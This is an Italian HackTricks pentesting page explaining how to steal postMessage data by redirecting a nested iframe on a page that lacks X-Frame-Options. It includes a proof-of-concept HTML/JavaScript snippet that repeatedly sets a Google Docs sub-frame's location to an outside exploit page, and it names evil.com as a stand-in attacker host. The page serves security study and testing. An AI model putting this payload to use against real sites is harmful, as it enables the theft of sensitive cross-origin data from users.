hacktricks/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
2024-02-10 13:03:23 +00:00

3.6 KiB

Rubare postmessage modificando la posizione dell'iframe

Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!

Modifica delle posizioni degli iframe figlio

Secondo questo articolo, se puoi inserire un iframe di una pagina web senza l'header X-Frame che contiene un altro iframe, puoi cambiare la posizione di quell'iframe figlio.

Ad esempio, se abc.com ha efg.com come iframe e abc.com non ha l'header X-Frame, potrei cambiare efg.com in evil.com cross origin utilizzando frames.location.

Questo è particolarmente utile nei postMessages perché se una pagina sta inviando dati sensibili utilizzando un jolly come windowRef.postmessage("","*"), è possibile cambiare la posizione dell'iframe correlato (figlio o genitore) in una posizione controllata dagli attaccanti e rubare quei dati.

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);

function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!